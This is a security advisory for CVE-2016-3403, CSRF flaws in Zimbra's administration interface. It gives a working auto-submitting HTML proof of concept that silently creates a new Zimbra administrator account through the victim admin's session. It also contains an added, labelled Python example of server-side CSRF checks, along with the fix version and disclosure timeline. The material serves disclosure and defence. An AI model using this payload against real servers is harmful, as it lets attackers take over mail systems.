
Zimbra Cross Site Request Forgery

2017-01-13 00:00:00
Damien Cauquil
packetstormsecurity.com

EPSS

0.005

Percentile

76.7%

# CVE-2016-3403: Multiple CSRF in Zimbra Administration interface
  
## Description  
  
Multiple CSRF vulnerabilities have been found in the administration interface of Zimbra. They allow actions such as adding, modifying and removing admin accounts to be triggered on behalf of a logged-in administrator.
  
## Vulnerability  
  
Every form in the administration part of Zimbra is vulnerable to CSRF because no CSRF token is used to tie a request to a valid session. As a consequence, requests can be forged by a third-party page and replayed arbitrarily.
  
**Access Vector**: remote  
**Security Risk**: low  
**Vulnerability**: CWE-352  
**CVSS Base score**: 5.8  
  
## Proof of Concept  
  
```html
<html>
<body>
<!-- enctype="text/plain" makes the body "name=value": the input's name holds the
     envelope up to the "=" inside n="sn", and the value holds the rest. -->
<form enctype="text/plain" id="trololo"
action="https://192.168.0.171:7071/service/admin/soap/CreateAccountRequest"
method="POST">
<input name='<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context
xmlns="urn:zimbra"><userAgent xmlns="" name="DTC"/><session xmlns=""
id="1337"/><format xmlns=""
type="js"/></context></soap:Header><soap:Body><CreateAccountRequest
xmlns="urn:zimbraAdmin"><name xmlns="">[email protected]</name><password
xmlns="">test1234</password><a xmlns=""
n="zimbraAccountStatus">active</a><a xmlns=""
n="displayName">ItWorks</a><a xmlns="" n'

value='"sn">itworks</a><a xmlns=""
n="zimbraIsAdminAccount">TRUE</a></CreateAccountRequest></soap:Body></soap:Envelope>'/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```
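The server-side checks that would stop the forged request above, written as an added example (not Zimbra's code and not part of the advisory): the handler rejects the `text/plain` body an HTML form produces, requires the admin console's own `Origin`, and requires a session-bound synchronizer token inside the SOAP context. The `csrfToken` element name, `SERVER_SECRET` and the admin origin are assumptions made for this example.

```python
import hashlib
import hmac
import xml.etree.ElementTree as ET

# Constructed values for this example; a real deployment keeps the secret server-side.
SERVER_SECRET = b"constructed-server-secret"
ADMIN_ORIGIN = "https://192.168.0.171:7071"          # origin of the admin console
SOAP_TYPES = ("application/soap+xml", "text/xml")    # what the real client sends


def issue_csrf_token(session_id: str) -> str:
    """Per-session token the admin console would embed in every SOAP envelope it sends."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def token_in_envelope(body: bytes):
    """Return the text of a csrfToken element (assumed name) in the envelope, or None."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    for el in root.iter():
        if el.tag.split("}")[-1] == "csrfToken":   # tolerate any namespace on the element
            return (el.text or "").strip()
    return None


def validate_admin_request(headers: dict, body: bytes, session_id: str):
    """Return (accepted, reason). The checks are independent; any failure rejects."""
    # 1. An HTML form can only post simple types such as text/plain; accept only SOAP XML.
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    if ctype not in SOAP_TYPES:
        return False, "unexpected content type"
    # 2. The browser-set Origin (or Referer) must be the admin console itself, not another site.
    origin = headers.get("Origin") or headers.get("Referer", "")
    if origin != ADMIN_ORIGIN and not origin.startswith(ADMIN_ORIGIN + "/"):
        return False, "cross-origin request"
    # 3. A synchronizer token bound to the session must be present and match (constant time).
    token = token_in_envelope(body)
    if token is None:
        return False, "missing csrf token"
    if not hmac.compare_digest(token.encode(), issue_csrf_token(session_id).encode()):
        return False, "bad csrf token"
    return True, "ok"
```

A forged page cannot read the victim's session token, so even if an attacker guessed the session id (as the PoC does with `1337`) the third check still fails.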
  
## Solution  
  
* Upgrade to version 8.7  
  
## Affected versions  
  
* All versions previous to 8.7  
  
## Fixes  
  
* https://bugzilla.zimbra.com/show_bug.cgi?id=100885  
* https://bugzilla.zimbra.com/show_bug.cgi?id=100899  
  
## Timeline (dd/mm/yyyy)  
  
* 24/02/2016: Issue reported to Zimbra  
* 24/02/2016: Issue acknowledged
* 20/06/2016: Complete fixes released with version 8.7
  
## Credits  
  
* Anthony LAOU-HINE TSUEI, Sysdream (laouhine_anthony -at- hotmail -dot- fr)
* Damien CAUQUIL, Sysdream (d.cauquil -at- sysdream -dot- com)
  
